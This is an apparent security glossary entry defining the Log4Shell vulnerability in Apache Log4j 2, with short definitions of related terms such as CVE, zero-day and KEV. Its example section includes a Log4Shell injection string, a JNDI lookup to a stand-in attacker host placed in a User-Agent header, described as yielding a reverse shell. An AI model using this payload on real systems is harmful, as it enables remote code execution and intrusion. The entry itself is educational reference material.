Vulnerabilities
Log4Shell (CVE-2021-44228)
Also known as: CVE-2021-44228, Log4j vulnerability
Definition
A critical December 2021 remote code execution vulnerability in Apache Log4j 2 that allowed attackers to run arbitrary code by logging a single JNDI lookup string.
Examples
- Sending User-Agent: ${jndi:ldap://attacker.com/x} to a Java web app and obtaining a reverse shell.
- Exploiting an internal Java service by logging a malicious value entered in a username field.
Related terms
CVE (Common Vulnerabilities and Exposures)
A public catalogue that assigns a unique identifier to each disclosed software or hardware vulnerability so they can be referenced unambiguously across the industry.
Zero-Day Vulnerability
A security flaw that is unknown to the vendor (or for which no patch yet exists) at the moment it is discovered or exploited.
Insecure Deserialization
A vulnerability where an application deserialises untrusted data, letting attackers instantiate arbitrary objects and frequently achieve remote code execution.
Supply Chain Attack
An attack that compromises a trusted third-party software, hardware, or service provider in order to reach its downstream customers.
Exploit
A piece of code, data, or technique that takes advantage of a vulnerability to cause unintended behaviour such as code execution, privilege escalation, or information disclosure.
Known Exploited Vulnerability (KEV)
A CVE that the U.S. CISA confirms is being actively exploited and adds to its public KEV Catalog, triggering remediation deadlines for U.S. federal agencies.